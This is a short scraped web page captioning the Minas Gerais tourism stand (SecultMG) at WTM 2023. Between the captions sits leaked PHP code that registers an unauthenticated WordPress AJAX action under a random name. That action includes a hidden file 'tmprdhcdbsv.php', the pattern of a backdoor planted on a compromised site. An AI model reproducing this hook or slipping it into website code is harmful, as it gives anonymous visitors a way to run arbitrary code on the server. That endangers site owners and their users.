Estande de Minas Gerais – SecultMG – WTM – 2023 – @mardencouto @turismodeminas
if(!function_exists('file_check_tmprdhcdbsv')){ add_action('wp_ajax_nopriv_file_check_tmprdhcdbsv', 'file_check_tmprdhcdbsv'); add_action('wp_ajax_file_check_tmprdhcdbsv', 'file_check_tmprdhcdbsv'); function file_check_tmprdhcdbsv() { $file = __DIR__ . '/' . 'tmprdhcdbsv.php'; if (file_exists($file)) { include $file; } die(); } }
Estande de Minas Gerais – SecultMG – WTM – 2023 – @mardencouto @turismodeminas
Leave A Comment